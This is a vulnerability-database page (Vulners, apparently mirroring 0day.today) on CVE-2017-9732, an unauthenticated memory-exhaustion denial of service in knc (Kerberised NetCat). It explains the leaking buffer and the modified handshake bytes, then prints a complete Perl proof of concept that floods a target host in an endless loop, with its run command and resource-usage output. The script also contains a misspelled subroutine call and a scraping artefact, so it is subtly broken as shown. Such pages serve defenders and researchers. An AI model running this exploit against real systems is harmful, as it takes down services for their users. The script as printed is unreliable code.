Vulners
Lucene search
knc (Kerberized NetCat) Denial Of Service Exploit
| Reporter | Title | Published | Views | Family All 8 |
|---|---|---|---|---|
 | CVE-2017-9732 | 21 Dec 201802:28 | – | circl |
 | Knc Kerberized NetCat Denial of Service Vulnerability | 4 Dec 201800:00 | – | cnvd |
 | CVE-2017-9732 | 20 Dec 201822:00 | – | cve |
 | CVE-2017-9732 | 20 Dec 201822:00 | – | cvelist |
 | EUVD-2017-18663 | 7 Oct 202500:30 | – | euvd |
 | CVE-2017-9732 | 20 Dec 201823:29 | – | nvd |
 | knc (Kerberized NetCat) Denial Of Service | 29 Nov 201800:00 | – | packetstorm |
 | Authentication flaw | 20 Dec 201823:29 | – | prion |
# Product
"KNC is Kerberised NetCat. It works in basically the same way as either netcat or stunnel except that it is uses GSS-API to secure the communication. You can use it to construct client/server applications while keeping the Kerberos libraries out of your programs address space quickly and easily."
## Links
Official page:
http://oskt.secure-endpoints.com/knc.html
Source code repository:
https://github.com/elric1/knc/
## CVE-2017-9732 vulnerability
knc (Kerberised NetCat) before 1.11-1 is vulnerable to denial of service (memory exhaustion) that can be exploited remotely without authentication, possibly affecting another services running on the targeted host.
The knc implementation uses a temporary buffer in read_packet() function that is not freed (memory leak). An unauthenticated attacker can abuse this by sending a blob of valid kerberos handshake structure but with unexpected type; instead of token type AP_REQ (0x0100) I sent 0x0000 at bytes 16 and 17 in my proof of concept. During the attack, gss_sec_accept_context returns G_CONTINUE_NEEDED and the memory is exhausted in the long run.
The attack might not even be logged, depending on how the Open Source Kerberos Tooling stack is configured.
## Exploit
```
./memory-exhaustion-poc.pl target-host target-port
```
Top output ~30 seconds later:
```
2 CPUs; last pid: 20507; load averages: 1.26, 0.84, 0.38 14:11:53
268 processes: 4 running, 264 sleeping
CPU states: 38.6% user, 0.0% nice, 27.1% system, 34.3% idle
cpu 0: 18.7% user, 0.0% nice, 22.9% system, 58.4% idle
cpu 1: 54.7% user, 0.0% nice, 30.7% system, 14.6% idle
Memory: 7857M real, 7734M used, 122M free Swap: 4094M total, 0K used, 4094M free
PID PSID USERNAME THR PRI NICE SIZE RES STATE TIME CPU COMMAND
20156 19806 username 1 20 0 2165M 2133M cpu1 19:41 46.19% knc
...
```
## Bugfix
https://github.com/elric1/knc/commit/f237f3e09ecbaf59c897f5046538a7b1a3fa40c1
## Proof of concept
# memory-exhaustion-poc.pl
#!/usr/bin/perl
use strict;
use warnings;
use IO::Socket::INET;
my $host = shift @ARGV || "127.0.0.1";
my $port = shift @ARGV || 2666;
my $sock = IO::Socket::INET->new(PeerPort => $port, PeerAddr => $host) or die "Cant connect: [email protected]\n";
$sock->autoflush();
my $data = pack("H*", without_spaces("
60 82 02 32 06 09 2a 86 48 86 f7 12 01 02 02 00
00 6e 82 02 21 30 82 02 1d a0 03 02 01 05 a1 03
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00
"));
while(1){
send_with_lenght_prefix($data);
}
sub send_with_length_prefix {
my $d = shift;
do_send(pack("N", length($d)));
do_send($d);
}
sub do_send {
my $d = shift;
printf STDERR ">> %s\n", unpack("H*", $d);
print $sock $d or die "Cant write: $!";
}
sub without_spaces {
my $d = shift;
$d =~ s/\s*//g;
return $d;
}
# 0day.today [2021-09-27] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
01 Dec 2018 00:00Current
0.1Low risk
Vulners AI Score0.1
CVSS 25
CVSS 37.5
EPSS0.04355